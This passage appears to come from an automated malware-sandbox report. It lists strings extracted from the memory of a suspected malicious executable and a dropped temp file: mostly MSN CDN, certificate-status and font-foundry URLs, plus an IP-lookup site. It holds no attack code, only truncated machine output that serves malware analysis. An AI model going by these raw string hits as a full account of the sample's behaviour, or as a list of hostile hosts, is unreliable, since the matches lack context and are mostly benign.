                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuG4N?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuQtg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTly?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuTp7?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuY5J?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuZko?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADuqZ9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv4Ge?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADv842?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbPR?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvbce?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AADvrrg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXiwM?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18qTPD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xJbM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yHSm?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yKf2?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19ylKx?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yqHP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB46JmN?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB6Ma4a?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBRUB0d?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBVuddh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBWoHwx?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBX2afX?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBi9v6?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBkwUr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnYSFZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BByBEMv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000002.518727160.0000000004001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0:
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0B
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0E
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0F
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0K
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0M
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.digicert.com0R
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.globalsign.com/rootr103
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.msocsp.com0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.pki.goog/GTSGIAG30
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.pki.goog/gsr202
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://ocsp2.globalsign.com/cloudsslsha2g30V
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0#
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0M
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://pki.goog/gsr2/GTSGIAG3.crt0)
                  Source: tDb0ggawON.exe, 0000000B.00000002.517829370.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://secure.globalsign.com/cacert/cloudsslsha2g3.crt06
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/2366737e/webcore/externalscripts/oneTrust/ski
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/5445db85/webcore/externalscripts/oneTrust/de-
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/3bf20fde-50425371/directi
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/css/f60532dd-3aac3bb8/directi
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-2923b6c2/directio
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/3bf20fde-b532f4eb/directio
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-ch/homepage/_sc/js/f60532dd-f8dd99d9/directio
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/81/58b810.gif
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/86/2042ed.woff
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA7XCQ3.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuG4N.img?h=75&w=100&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuQtg.img?h=166&w=310
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTly.img?h=166&w=310
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuTp7.img?h=333&w=311
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuY5J.img?h=166&w=310
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuZko.img?h=75&w=100&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADuqZ9.img?h=75&w=100&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv4Ge.img?h=75&w=100&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADv842.img?h=250&w=300
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbPR.img?h=250&w=300
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvbce.img?h=333&w=311
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AADvrrg.img?h=166&w=310
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXiwM.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyuliQ.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzjSw3.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB16g6qc.img?h=27&w=27&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18T33l.img?h=333&w=31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB18qTPD.img?h=16&w=16&
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19x3nX.img?h=166&w=31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xGDT.img?h=166&w=31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xJbM.img?h=75&w=100
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19xaUu.img?h=166&w=31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yF6n.img?h=333&w=31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yHSm.img?h=75&w=100
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yKf2.img?h=250&w=30
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19ylKx.img?h=75&w=100
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yqHP.img?h=75&w=100
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yuvA.img?h=250&w=30
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB19yxVU.img?h=166&w=31
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB46JmN.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB6Ma4a.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBO5Geh.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBRUB0d.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBWoHwx.img?h=27&w=27&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBX2afX.img?h=27&w=27&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBi9v6.img?m=6&o=true&u
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBkwUr.img?h=16&w=16&m=
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnYSFZ.img?h=16&w=16&m
                  Source: bhvED7C.tmp.14.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BByBEMv.img?h=16&w=16&m
                  Source: tDb0ggawON.exe, 00000000.00000002.303672569.0000000004CE9000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.308274343.00000000062B1000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 0000000B.00000000.296875600.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://whatismyipaddress.com/-
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.264550366.0000000008857000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                  Source: tDb0ggawON.exe, 00000000.00000003.267830462.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269954755.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.265215188.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268801782.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268343485.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com
                  Source: tDb0ggawON.exe, 00000000.00000003.267830462.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269954755.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268801782.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268343485.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.com6
                  Source: tDb0ggawON.exe, 00000000.00000003.267830462.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269954755.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268801782.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268343485.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.comar
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.309924532.0000000008847000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.300716031.0000000008847000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                  Source: tDb0ggawON.exe, 00000000.00000002.309924532.0000000008847000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.300716031.0000000008847000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.coml1
                  Source: tDb0ggawON.exe, 00000000.00000002.309924532.0000000008847000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.300716031.0000000008847000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.commcom
                  Source: tDb0ggawON.exe, 00000000.00000002.309924532.0000000008847000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.300716031.0000000008847000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.comoV
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                  Source: tDb0ggawON.exe, 00000000.00000003.263370600.000000000886C000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.263539092.0000000008872000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.c
                  Source: tDb0ggawON.exe, 00000000.00000003.263370600.000000000886C000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.263616582.000000000886C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                  Source: tDb0ggawON.exe, 00000000.00000003.264108956.000000000886C000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.263616582.000000000886C000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.263972629.000000000886C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/t
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                  Source: tDb0ggawON.exe, 00000000.00000002.310251418.0000000009A52000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                  Source: tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                  Source: tDb0ggawON.exe, 00000000.00000003.267830462.0000000008844000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269954755.000000000884E000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268287341.0000000008859000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268733117.0000000008855000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268545826.0000000008854000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268234994.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.268486124.000000000884A000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/3
                  Source: tDb0ggawON.exe, 00000000.00000003.268733117.0000000008855000.00000004.00000800.00020000.00000000.sdmp, tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/:
                  Source: tDb0ggawON.exe, 00000000.00000003.269086352.0000000008855000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/A
